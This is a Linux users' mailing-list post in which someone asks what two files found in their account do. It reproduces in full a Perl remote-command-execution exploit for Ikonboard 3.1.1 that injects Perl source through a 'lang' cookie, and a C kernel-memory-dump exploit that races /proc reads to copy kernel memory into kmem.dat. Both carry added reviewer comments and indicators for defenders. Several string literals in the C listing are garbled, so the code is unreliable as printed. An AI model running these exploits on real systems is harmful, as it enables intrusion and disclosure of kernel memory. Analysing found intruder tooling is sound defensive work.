Someone uploaded a file to one of my accounts. Can someone tell me what it does? Thank you.
FILE 1 IBE.C ----------------------------------------------------------------------
#!/usr/bin/perl
#
# Date: 5 May 2003
# Author: DeadLine [http://www.Q8Crackers.us]
#
# Ikonboard 3.1.1 Remote Command Execution PoC
# ============================================
# This bug was found by Nick Cleaton.
#
# For more info and patch, go to:
# http://archives.neohapsis.com/archives/bugtraq/2003-04/0027.html
#
# This is a functional version. Use at your own risk.
# Coupled wif the kernel bug, this could be used to root quite
# an impressive number of Linux boxes out there. Enjoy!
#
# Greetz.. my team mates: Marvol .. befcake .. Remsis
# And some new frens: vegas ;)
#
# ---------------------------------------------------------------------------
# Reviewer summary of what the code below does:
#   * Despite the ".C" label in the post, this is a Perl script (see shebang).
#   * It is a network client: it opens one TCP connection to port 80 of the
#     host named on the command line and sends a single HTTP GET for the
#     board's CGI path. Nothing in it reads or writes local files.
#   * The request carries a "lang" cookie whose value is not a language name
#     but URL-encoded Perl source that wraps a shell command in backticks.
#   * It then scans the reply for ---BEGIN--- / ---END--- marker lines and
#     prints what lies between them; if the markers never show up it reports
#     the host as not vulnerable.
# NOTE(review): that the board ends up executing the cookie value is taken
# from the header above ("Remote Command Execution") and the Bugtraq post it
# links, not from anything visible in this file. The same post is where the
# header says the patch is described.
# NOTE(review): finding this in an account suggests the account was used to
# store or launch tooling against other hosts -- presumably; confirm from
# shell history, process accounting and outbound connection logs.
# ---------------------------------------------------------------------------
use Socket;
use FileHandle;

# Argument handling: the host is mandatory, the command and CGI path are optional.
if ($ARGV[0] eq '') {
    print "Usage: $0 <host> [cmd] [path]\n";
    exit;
}

my $port=80;                                              # destination port is fixed
my $host=$ARGV[0];
my $addr=getaddr($ARGV[0]);                               # packed 4-byte address
my $cmd=$ARGV[1]?($ARGV[1]):"/bin/uname -a";              # default command
my $path=$ARGV[2]?($ARGV[2]):"/cgi-bin/ikonboard.cgi";    # default CGI path

# Cookie value. The string is Perl source text: it emits a text/plain header,
# then the output of the command framed by ---BEGIN--- / ---END---, then exits.
# $cmd is interpolated here as text; the backticks are part of the string, so
# the command is not run on the machine executing this script.
# URLEncode() turns every non-word character (including the NUL byte) into %XX.
# Defender note: on the wire this appears as a "lang" cookie that is long and
# consists mostly of %XX escapes, %00 among them. A legitimate language cookie
# is presumably a short plain name -- confirm against the board's own format.
my $buff=URLEncode(".\0\" unless(1);"
    ."print \"Content-type: text/plain\\r\\n\\r\\n\";"
    ."print \"---BEGIN---\\n\".`$cmd`.\"\\n---END---\";exit;#");

# Plain TCP socket; the sockaddr_in structure is packed by hand.
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";

# The whole request: GET line, Host, the crafted Cookie, Connection: close.
SOCKET->autoflush();
print SOCKET "GET $path HTTP/1.1\r\n";
print SOCKET "Host: $host\r\n";
print SOCKET "Cookie: lang=$buff\r\n";
print SOCKET "Connection: close\r\n\r\n";

print "Ikonboard Exploit, by DeadLine [ [EMAIL PROTECTED] ]\n\n";

# Response handling: everything before a line starting with ---BEGIN--- is
# skipped, lines up to ---END--- are echoed, and the script exits there.
# Defender note: these two marker strings in an HTTP response body from the
# board's CGI are a direct sign that the request above succeeded.
while (<SOCKET>) {
    if (/^---BEGIN---/) {
        print "> $cmd\n";
        while (<SOCKET>){
            if (/^---END---/) {
                exit;
            }
            print;
        }
    }
}

# Reached only when the markers were never seen in the reply.
print "$host seems not vulnerable.\n";
exit;

# getaddr(host): returns a packed 4-byte address. The dots are stripped from a
# copy of the argument; if what remains contains a digit, the argument is
# split on dots and packed as four bytes, otherwise gethostbyname() is used.
sub getaddr {
    my $host=($_[0]);
    my $n=$host;
    $n=~tr/\.//d;

    if ($n=~m/\d+/) {
        return pack('C4',split('\.',$host));
    }
    else {
        return (gethostbyname($host))[4];
    }
}

# URLEncode routine, courtesy of Glenn Fleishman
# Replaces each character matching \W with "%" followed by its two-digit
# upper-case hex code and returns the result.
sub URLEncode {
    my $theURL=$_[0];
    $theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    return $theURL;
}
FILE 2 
kernel_proc.dump-------------------------------------------------------- ----
/*
 *
 * /proc ppos kernel memory read (semaphore method)
 *
 * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

/*
 * Reviewer summary of what the code below does:
 *   - It is a local program. It maps a user-supplied file, opens /proc/mtrr
 *     read-only, and creates a 64 MiB file "kmem.dat" (mode 0644) in the
 *     current directory, mapped shared and writable as `buf`.
 *   - A clone()d thread that shares memory and the descriptor table runs
 *     madvise() calls on the mapped file while the main thread reads from
 *     the /proc descriptor. The two are ordered through the go[] flags.
 *   - If a later _llseek(SEEK_CUR) on the /proc descriptor fails, the main
 *     thread reads page after page from that descriptor into `buf`. `buf`
 *     is the shared mapping of kmem.dat, so the data ends up in that file.
 *   - The header comment describes the goal as a kernel memory read, which
 *     for a defender is a local information-disclosure tool.
 *
 * NOTE(review): which kernel versions are affected, and the fix, are not
 * stated on this page; check the vendor kernel advisories from 2004 for the
 * /proc file-offset issue reported by the author named above.
 * NOTE(review): the listing reached this page with line breaks collapsed and
 * several string literals visibly damaged (a "0" where an escape sequence
 * presumably stood). They are reproduced as found, not repaired.
 *
 * Host artifacts visible in the code: a file named kmem.dat truncated to
 * 64 MiB, an unprivileged open of /proc/mtrr, and exit(31337) on errors
 * (a parent process sees the low 8 bits, i.e. 105).
 */

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <asm/page.h>

// define machine mem size in MB
#define MEMSIZE 64

// Kernel-header macro (old <linux/unistd.h>) that generates a direct wrapper
// for the _llseek system call. The 64-bit offset is passed as hi/lo halves
// and the resulting position is stored through `res`.
_syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res, uint, wh);

/*
 * Report an error and terminate the process.
 * Prints `msg` to stderr directly when errno is 0, otherwise through
 * perror(); flushes both streams and exits with status 31337.
 */
void fatal(const char *msg)
{
    printf("0");
    if(!errno) {
        fprintf(stderr, "FATAL ERROR %s0", msg);
    }
    else {
        perror(msg);
    }
    printf("0");
    fflush(stdout);
    fflush(stderr);
    exit(31337);
}

// State shared between main() and the clone()d thread (CLONE_VM).
//   fd/pfd : scratch descriptor / the /proc/mtrr descriptor
//   csize  : page-rounded size of the user-supplied file
//   fsize  : size of kmem.dat, MEMSIZE MiB
//   size   : length of the first read from pfd, one page
static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE, size=PAGE_SIZE, us;
// go[0] is written by the child, go[1] by the parent; each side busy-waits
// on or tests the other's flag.
static volatile int go[2];
static loff_t off;
// buf: mapping of kmem.dat; file: mapping of the user-supplied file;
// child_stack: one page used as the clone()d thread's stack.
static char *buf=NULL, *file, child_stack[PAGE_SIZE];
static struct timeval tv1, tv2;
static struct stat st;

// child close sempahore & sleep
/*
 * Entry point of the clone()d thread.
 * Issues madvise() calls on the mapped file around a zero-length read of the
 * /proc descriptor, then either repositions that descriptor and signals
 * success through go[0]=2, or sends SIGTERM to the parent. Always ends in
 * _exit(1); the trailing return is never reached.
 * The result depends on timing against the parent's read(), so statement
 * order here is significant.
 */
int start_child(void *arg)
{
    // unlock parent & close semaphore
    go[0]=0;
    madvise(file, csize, MADV_DONTNEED);
    madvise(file, csize, MADV_SEQUENTIAL);
    gettimeofday(&tv1, NULL);
    read(pfd, buf, 0);              // zero-length read on the /proc descriptor
    go[0]=1;                        // releases the parent's first busy-wait
    r = madvise(file, csize, MADV_WILLNEED);
    if(r)
        fatal("madvise");

    // parent blocked on mmap_sem? GOOD!
    if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
        // Sets the shared file position to hi=0x7fffffff, lo=0xffffffff,
        // i.e. the largest positive signed 64-bit offset.
        r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
        if( r == -1 )
            fatal("lseek");
        printf("0 Race won!"); fflush(stdout);
        go[0]=2;                    // releases the parent's second busy-wait
    } else {
        // NOTE(review): the collapsed listing does not show where this
        // comment ended; it is assumed to cover only the printf, which
        // would not compile as written.
        // printf("0 Race lost %d", use another file!0, go[1]);
        fflush(stdout);
        kill(getppid(), SIGTERM);
    }
    _exit(1);

    return 0;
}

/* Print the usage line (program name plus the expected file argument) and exit with status 1. */
void usage(char *name)
{
    printf("0SAGE: %s <file not in cache>", name);
    printf("0");
    exit(1);
}

/*
 * Program entry: set up the two mappings and the /proc descriptor, start the
 * helper thread, perform the timed read, and, if the descriptor's position
 * can no longer be queried, copy pages from it into kmem.dat.
 * av[1] is the path of the file to map; the usage text asks for one that is
 * not in the page cache.
 */
int main(int ac, char **av)
{
    if(ac<2)
        usage(av[0]);

    // mmap big file not in cache
    r=stat(av[1], &st);
    if(r)
        fatal("stat file");
    csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);  // round up to a page multiple

    fd=open(av[1], O_RDONLY);
    if(fd<0)
        fatal("open file");
    file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
    if(file==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("0 mmaped uncached file at %p - %p", file, file+csize);
    fflush(stdout);

    // The /proc entry read throughout; opened read-only.
    pfd=open("/proc/mtrr", O_RDONLY);
    if(pfd<0)
        fatal("open");

    // Output file: created or truncated, sized to fsize, then mapped shared
    // so that anything stored through `buf` is written to kmem.dat.
    fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
    if(fd<0)
        fatal("open data");

    r=ftruncate(fd, fsize);
    if(r<0)
        fatal("ftruncate");

    buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
    if(buf==MAP_FAILED)
        fatal("mmap");
    close(fd);
    printf("0 mmaped kernel data file at %p", buf);
    fflush(stdout);

    // clone thread wait for child sleep
    // CLONE_VM|CLONE_FILES: the thread shares memory and the descriptor
    // table, so pfd in both threads is the same open file and position.
    // The stack pointer passed is near the top of child_stack.
    nc = nice(0);
    cpid=clone(&start_child, child_stack + sizeof(child_stack)-4, CLONE_FILES|CLONE_VM, NULL);
    nice(19-nc);                    // presumably lowers the parent's priority to 19 -- nc is taken as the current nice value
    while(go[0]==0) {               // spin until the child sets go[0]
        i++;
    }

    // try to read & sleep & move fpos to be negative
    gettimeofday(&tv1, NULL);
    go[1] = 1;                      // tells the child the read is in progress
    r = read(pfd, buf, size );
    go[1] = 2;
    gettimeofday(&tv2, NULL);
    if(r<0)
        fatal("read");
    while(go[0]!=2) {               // spin until the child reports success
        i++;
    }

    // Elapsed time of the read in microseconds.
    us = tv2.tv_sec - tv1.tv_sec;
    us *= 1000000;
    us += (tv2.tv_usec - tv1.tv_usec) ;

    printf("0 READ %d bytes in %d usec", r, us); fflush(stdout);

    // A failing position query is what the program treats as success.
    r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
    if(r < 0 ) {
        printf("0 SUCCESS, lseek fails, reading kernel mem...0");
        fflush(stdout);
        i=0;
        // Copy loop: one page per read(), advancing through the kmem.dat
        // mapping, until a read returns anything other than a full page.
        for(;;) {
            r = read(pfd, buf, PAGE_SIZE );
            if(r!=PAGE_SIZE)
                break;
            buf += PAGE_SIZE;
            i++;
            printf(" PAGE %6d", i); fflush(stdout);
        }
        // NOTE(review): the literal below is split across a line break in
        // the listing as found; it is reproduced unchanged.
        printf("0 
done, err=%s", strerror(errno) );
        fflush(stdout);
    }
    close(pfd);

    printf("0");
    sleep(1);
    kill(cpid, 9);                  // signal 9 to the helper thread

    return 0;
}
-- Philippine Linux Users' Group (PLUG) Mailing List [EMAIL PROTECTED] (#PLUG @ irc.free.net.ph) Official Website: http://plug.linux.org.ph Searchable Archives: http://marc.free.net.ph . To leave, go to http://lists.q-linux.com/mailman/listinfo/plug . Are you a Linux newbie? To join the newbie list, go to http://lists.q-linux.com/mailman/listinfo/ph-linux-newbie
